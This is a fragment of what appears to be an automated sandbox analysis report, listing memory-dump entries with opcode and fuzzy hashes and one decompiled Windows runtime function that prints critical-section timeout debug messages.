                                                • Instruction ID: c8dd42b277ce6473c77c6869621b3cbd552901e4868bfc3fdf94ec954c97f59f
                                                • Opcode Fuzzy Hash: 5185f61507fe4baf0e8b443139626b7797727fe59bbe1748e07a9dd809f9088e
                                                • Instruction Fuzzy Hash: CBC1F1755097818FD354CF28C580A5AFBF1BF88304F184AAEF8998B392D771E985CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5c861fcdae5183e200d9846617352da8158e24fcdb24042d1371b32fae0ae2a
                                                • Instruction ID: 97dfb72a0f0b218ceb040acb750b7843920804a62b0add211936ecfe22a1a7e5
                                                • Opcode Fuzzy Hash: e5c861fcdae5183e200d9846617352da8158e24fcdb24042d1371b32fae0ae2a
                                                • Instruction Fuzzy Hash: C0914971E00218EFEB359B68CD45FAE7BE4EB01714F1642A9FA11A72E1DB749D40CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b53bf61db807f99b6f1e0da92b68af289149a7123ea337a0590a9a2311bfa97
                                                • Instruction ID: 7ca7390788008234d1271ca193a729c89774d6421c4f5bda93d78a52d186259b
                                                • Opcode Fuzzy Hash: 6b53bf61db807f99b6f1e0da92b68af289149a7123ea337a0590a9a2311bfa97
                                                • Instruction Fuzzy Hash: 47711032200B11AFDB31CF24E985F66B7E5EF44720F244968E65A8B2A1DF71E980CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                • Instruction ID: 8e0fd55c1a56ce47a8555c21f7b5e2a6b1bb2be8092a8b5ed9621e2bdf6972d9
                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                • Instruction Fuzzy Hash: 98716C71A00219AFCB10DFA5C985AEEBBF9FF48710F1045A9E505E7252DB34EA81CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bedd8a67270fce4f4fce97063326da6f0d03e176dbeb629c132a402e023e546d
                                                • Instruction ID: 7e5f705797d0c28fa84e7486f3d56472f04693bb730c7dbba5d8187635aeec3e
                                                • Opcode Fuzzy Hash: bedd8a67270fce4f4fce97063326da6f0d03e176dbeb629c132a402e023e546d
                                                • Instruction Fuzzy Hash: C8519F7AB001158FCB18DF1DC890BBDB7B1FB88700716856EE856AB364DB30AE51DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74c777b8bc466d3c4ae098bd8859f9816deec4d66a00a8d4033ac155eac838c9
                                                • Instruction ID: c4e7522f4a371c9c53a2560dc56971b9603559d61530b86912b46a314e031560
                                                • Opcode Fuzzy Hash: 74c777b8bc466d3c4ae098bd8859f9816deec4d66a00a8d4033ac155eac838c9
                                                • Instruction Fuzzy Hash: 6B519E71A01605DFCB14CFA8C590AEEBBF9BF49310F20855AD595AB342EB71AD44CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                • Instruction ID: 397be53597850578adf0af060a8f3c2e38324c6fc83e5a41df663214f9bd31b5
                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                • Instruction Fuzzy Hash: CA51AA71640606EFDB15CF14C580A96BBF5FF55308F1481FAE8099F222EB71E946CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9071f2ee8a0c7251ccbe51f321803d35f598142a9af94a3e4440d5485a7c5f60
                                                • Instruction ID: 4177cd73c9e86915dedd70bb9320f6477f141114188f74f815c539c466382e8c
                                                • Opcode Fuzzy Hash: 9071f2ee8a0c7251ccbe51f321803d35f598142a9af94a3e4440d5485a7c5f60
                                                • Instruction Fuzzy Hash: 8E514371A00209AFDF25DF59C980FDEBBB1FB48350F168059E815AB260C3719D52DF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f74b004c182a1ee3f822987650ff410d511bbcbeca0761436110516933932f91
                                                • Instruction ID: 9cfccd9830a4376a5b58d56f3ffadeb5a9b2d9019f22c9a6602aba4c427d4beb
                                                • Opcode Fuzzy Hash: f74b004c182a1ee3f822987650ff410d511bbcbeca0761436110516933932f91
                                                • Instruction Fuzzy Hash: EC41B271A40318AFEB31DF14CD91FAABBA9FB48710F06409EE8469B291DB74DD40CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d480ebce8449740772204baf49c1fe49493b358f213b72e4cfc210eed02b2660
                                                • Instruction ID: ddde2d51ce5ebde77b829bf6181f3c6246f832dd3b7c8d4ecaed1940c7676650
                                                • Opcode Fuzzy Hash: d480ebce8449740772204baf49c1fe49493b358f213b72e4cfc210eed02b2660
                                                • Instruction Fuzzy Hash: 0841B335A052289FCB21DF68C941FEE77F8EF49710F0100A9E909AB291DB74DE84CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f72c007e3bb15d02d6281de395a7cfcd429ac3fe6bec6f31f41865ed1ae77d3
                                                • Instruction ID: 3d462fb77698585d141848501045d93da4178fc69a000f49d4ceabcec96a7163
                                                • Opcode Fuzzy Hash: 9f72c007e3bb15d02d6281de395a7cfcd429ac3fe6bec6f31f41865ed1ae77d3
                                                • Instruction Fuzzy Hash: B34174B1A0132C9BDB24DF55CC88BA9B7F4FB55340F1145EAE81997292EB749E80CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                • Instruction ID: 245c2483a777895eb4426b638085e029cb7a65e5d508fb1a7e2e13faa59bdf1f
                                                • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                • Instruction Fuzzy Hash: 3231E232B001446BDB169B69C885BAFFBEAEF84312F1581E9EC05B7252DA749D08C691
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                • Instruction ID: 306ae305d39996231bab56c48d30bff32870f1567b8622df6b56bb43ddec7a8d
                                                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                • Instruction Fuzzy Hash: 213105322006416FD722A768C886F7AFBEAEBC5341F1844E8FC468B752DA74DC45C720
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                • Instruction ID: 5c6bff344c0561a8187ed3426eca647dc28ff18f9235af2d640ef846716a2521
                                                • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                • Instruction Fuzzy Hash: 783190726047059FC719DF24C981A6BB7EAFBC0351F0489ADF96687641DB30E909CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                • Instruction ID: a41399455260dd0b1032b47baa4efffde990341fbe428a03d770ef4da36c47ae
                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                • Instruction Fuzzy Hash: 24018F72254A84DFD322C75CC988FB777ECEB56750F0940A5FA19CBA92D768DC40C621
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f007506db8708b676d02687a51f272ba2bee6c09388f830a7042450b0602370
                                                • Instruction ID: ffc18093bc8d255e32be9c0c6f4607de3a73fd5cc1949d8c4fdaf58eccabebb7
                                                • Opcode Fuzzy Hash: 4f007506db8708b676d02687a51f272ba2bee6c09388f830a7042450b0602370
                                                • Instruction Fuzzy Hash: 020147725047819FCB10EF2CC941B1A77E9EBC4310F08CAA9F885832A1EE35D980CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a80266e2c51e041d3faf5d651673e5a16fd9387df575de649edaadcdcf815f3b
                                                • Instruction ID: ac78940ad625e4b859b551114d6b3068188634913d37f97d4fedbf0b30fcbd2f
                                                • Opcode Fuzzy Hash: a80266e2c51e041d3faf5d651673e5a16fd9387df575de649edaadcdcf815f3b
                                                • Instruction Fuzzy Hash: 73018471A01218AFCB14DBA9D946FBFB7B8EF45700F044066B901AB391EA70DE01C795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e755042ff57ce5b41ec44897a10f6aa6a93caf60f9455c27aebe14c769607aff
                                                • Instruction ID: fa9d7498c96a94e0daa1ed2397a3e06446c595d3914393b535103e59aa122d27
                                                • Opcode Fuzzy Hash: e755042ff57ce5b41ec44897a10f6aa6a93caf60f9455c27aebe14c769607aff
                                                • Instruction Fuzzy Hash: 46018471A04218AFCB14DFA9D846FAFBBB8EF44700F004066B901AB391DA70DA01C7A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d946647e814467c30bd914cfbb2dc1721e45b2e49bad43b889ef5935f84221f
                                                • Instruction ID: 4be4065c123e271ecb2de855d4b9ea2954bafcc65e8c4852b4e1442cae2f31fd
                                                • Opcode Fuzzy Hash: 0d946647e814467c30bd914cfbb2dc1721e45b2e49bad43b889ef5935f84221f
                                                • Instruction Fuzzy Hash: 76111E71A042199FDB04DFA8D541BAEB7F4FF08300F1442AAE519EB382EA34D940CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 58d862a74e680c5a4a1c349c94e9221545c392bdd570e872a1bef7b9ae64deba
                                                • Instruction ID: 1fb6660be919171d34fdd9f67a72ce9f5fe60cef91e0e1ed9812fcb8f8935cd8
                                                • Opcode Fuzzy Hash: 58d862a74e680c5a4a1c349c94e9221545c392bdd570e872a1bef7b9ae64deba
                                                • Instruction Fuzzy Hash: CB012C71A0021CAFCB00DFA9D9419EEB7F8EF48350F10405BF905E7351EA34A901CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                • Instruction ID: 4883abab2df26f39ae6768789b00fe2974e76cea75865adaa989635d7dfd917d
                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                • Instruction Fuzzy Hash: 1FF0FC333015229BDB325B998990F6BB6E58FC1B60F270035F1059F345CD608C4297D1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                • Instruction ID: bdac64edd5c40f1623afda078804fa55fef63b48b9c9a537b46cca4a5e8f34f0
                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                • Instruction Fuzzy Hash: 2B01F932354684DFD722975DD904FAA7BE8EF85790F1800A1FA148B6B2E778CC00C724
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08816d7e8e6539187a353d75facf449b76dea1e7e61ce0e2893b9172aef8bf4d
                                                • Instruction ID: ad8d17fde3a879c3d1258014e7660f2bb3c43a88c18fee8b2c33a4253c575128
                                                • Opcode Fuzzy Hash: 08816d7e8e6539187a353d75facf449b76dea1e7e61ce0e2893b9172aef8bf4d
                                                • Instruction Fuzzy Hash: 0C016270A04219EFCB14DFA8D542A6EB7F4EF04300F1041AAB509DB392DA35D901CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4468cff4cdf2204c6a2301cbc93fec8c091de2958d6fad64ae106af0aab2fc90
                                                • Instruction ID: 95a07d5a4d86ff27914bf3db0f66719b0fb6070dc4abbf77f362219f9e0bd789
                                                • Opcode Fuzzy Hash: 4468cff4cdf2204c6a2301cbc93fec8c091de2958d6fad64ae106af0aab2fc90
                                                • Instruction Fuzzy Hash: 4D013171A05208AFCB04DFA9D545AAEB7F4FF48700F10449ABC05EB391E674DA00CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d962686b3b8d20f004a29d24b98bc1bb28ee46f3c100e9256b476ce0aa09cc7
                                                • Instruction ID: 6950ec07ac13585b6fb68a2d3a8a477c3556c53f8c413440dff075b8ff79ae60
                                                • Opcode Fuzzy Hash: 0d962686b3b8d20f004a29d24b98bc1bb28ee46f3c100e9256b476ce0aa09cc7
                                                • Instruction Fuzzy Hash: 3BF0BEB29956909FD731CB28C044FA27BEC9B05770F9487ABE60A87203C7A5FC80C250
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98cf40ae3f112cea46057e5abf9c111a2dbe46e6965e82d628136467bd317b4f
                                                • Instruction ID: 397af52ec886288ca9b868989f01622e27e9e2665ada2925518f359c142e0214
                                                • Opcode Fuzzy Hash: 98cf40ae3f112cea46057e5abf9c111a2dbe46e6965e82d628136467bd317b4f
                                                • Instruction Fuzzy Hash: F5F0203B8131854BEF366B2828023E13BE0C746311F5E04D6EC905B2A2CE348D8BCB20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c53cccc9be56c772b2a232715a1302c4d25e86d8aa29f08551d585c475d4096
                                                • Instruction ID: 4c81f99956ee586db94ddf7b05d9e0ad5b9cfce381cf70b4980a50f11dae27c5
                                                • Opcode Fuzzy Hash: 1c53cccc9be56c772b2a232715a1302c4d25e86d8aa29f08551d585c475d4096
                                                • Instruction Fuzzy Hash: 25F05470A046089FD714EFB8D546AAE77B4EF54700F5084AAF916EB391EA34D900CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                • Instruction ID: bda652ee11ffd8f3fd4a2f8d2f218c5e62d6ad532998198397ae3caf7f1acfe5
                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                • Instruction Fuzzy Hash: ACE02232340A002BE7219F0ACC81F8377ADEF82720F04407AB9051F383CAE6DC0887A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f2cf0bf8123308144f857e7a8b0c94bd1218e590a0c6bf10812548ac0bd7648
                                                • Instruction ID: 7201efb29f462863d2a36f0dc416d49636a9b6aec04d9436fa4b6dcf7f3a1e54
                                                • Opcode Fuzzy Hash: 4f2cf0bf8123308144f857e7a8b0c94bd1218e590a0c6bf10812548ac0bd7648
                                                • Instruction Fuzzy Hash: 00F08970A041089BCB04DBA8D946DAE77B4EF49300F10019AF516EB3D1EA34D900C754
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8aa62866a61e0d84536cbde99f7a9e85fb6001e1dc2fc349a10c775650d91acc
                                                • Instruction ID: 0346b767084e6337c322c629be0c28ab49bba7f7a896cdf6d764a92da0d5f568
                                                • Opcode Fuzzy Hash: 8aa62866a61e0d84536cbde99f7a9e85fb6001e1dc2fc349a10c775650d91acc
                                                • Instruction Fuzzy Hash: 75F0E93460C144AACF019768C940BFDBFB9AF84311F140265E851AB163E7E4DC00C785
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae501f38e4502d05070c713612007d83c4c12c83fd8ade59774f4042de7ea830
                                                • Instruction ID: ce00581921d0352e8628789807f3264943c969b759f791582d9afae22fa2f96b
                                                • Opcode Fuzzy Hash: ae501f38e4502d05070c713612007d83c4c12c83fd8ade59774f4042de7ea830
                                                • Instruction Fuzzy Hash: 0EF082B0A14258ABDB10EBA8EA06E6E73B8EF04300F140599BA05DB3D1EA74D900C798
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74e52ce634cdb4f85dd6381f3142d0ffd864f065fafb042bff4b7a502db7428a
                                                • Instruction ID: 87fdab05deda215bd089ab0b4ab8d2a2c0a3d31aa62364ad7b1195513a2f1ce8
                                                • Opcode Fuzzy Hash: 74e52ce634cdb4f85dd6381f3142d0ffd864f065fafb042bff4b7a502db7428a
                                                • Instruction Fuzzy Hash: 1FE09272A41421ABD2115F18AD01F67B3AEDBE5755F1A8039F505C7221DA68DD01C7E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                • Instruction ID: 61e7b028a0a0844469bd25401834c39e5d2754154ee5101ef7e5653309880699
                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                • Instruction Fuzzy Hash: 86E0DF32A41128BFCB21AAD99E06FABBBADDB48B60F0101A5B904DF151D5649E00C2D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ddbdff4a83c27d2f7f84570bffa2c0217d9be8b125fa8c019f6938edf26c778e
                                                • Instruction ID: fb5732e37569f955bcb91a8c3029ab0aabe90a6abc52e471a5e36581a1d39c39
                                                • Opcode Fuzzy Hash: ddbdff4a83c27d2f7f84570bffa2c0217d9be8b125fa8c019f6938edf26c778e
                                                • Instruction Fuzzy Hash: E4F0157D860740DFCBA0EFAAAA0170436F4F744B10FA041AAA018876B5CF344C80CF02
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                • Instruction ID: 89cb498c29804db62dd60103514e3e801102e0a3db43af64d0c6565d606cff37
                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                • Instruction Fuzzy Hash: B6E0C231284244FBDF229E44CD01FA97BAADB507A0F204071FE085A6A2CA719D91E6C8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1bb2f0b5586b64b34f272976f2820e9538af9fdd28d00a8faf53a088e708df86
                                                • Instruction ID: af38f521fe6f0b59e5f26f92563df121c634c537a85927d8d65b35ec73ff5ea9
                                                • Opcode Fuzzy Hash: 1bb2f0b5586b64b34f272976f2820e9538af9fdd28d00a8faf53a088e708df86
                                                • Instruction Fuzzy Hash: 4AD0C7621200041ACB2C33119E15F362396E7A4B18F2549ADF10A0A9B2DEB08CD0D24B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c113bb31d96b689ea0fcee8a24fae779a612df14cb399163684c57d282dbce53
                                                • Instruction ID: f4de87a40fb2263c9eb52c0addb3ef8ba1c7ea1cefc3e2b3ac55d1450ab8022e
                                                • Opcode Fuzzy Hash: c113bb31d96b689ea0fcee8a24fae779a612df14cb399163684c57d282dbce53
                                                • Instruction Fuzzy Hash: CED0A932300200A2DA2D6B109919F142396EB82B85F3904ACF20B4A8D3CFB0CCA2E488
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                • Instruction ID: 2f5f5ebbbdb463315b09aa2c11900c346e6797864a4a5af83764c433c4c96ab7
                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                • Instruction Fuzzy Hash: 96E08C31A04A80DBCF22DB48CA50F8EB7F9FB84B40F140054B0095F662C664AC40CB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                C-Code - Quality: 53%
                                                			E00B2FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                				void* _t7;
                                                				intOrPtr _t9;
                                                				intOrPtr _t10;
                                                				intOrPtr* _t12;
                                                				intOrPtr* _t13;
                                                				intOrPtr _t14;
                                                				intOrPtr* _t15;
                                                
                                                				_t13 = __edx;
                                                				_push(_a4);
                                                				_t14 =  *[fs:0x18];
                                                				_t15 = _t12;
                                                				_t7 = L00ADCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                				_push(_t13);
                                                				L00B25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                				_t9 =  *_t15;
                                                				if(_t9 == 0xffffffff) {
                                                					_t10 = 0;
                                                				} else {
                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                				}
                                                				_push(_t10);
                                                				_push(_t15);
                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                				return L00B25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                			}











                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B2FDFA
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B2FE01
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B2FE2B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
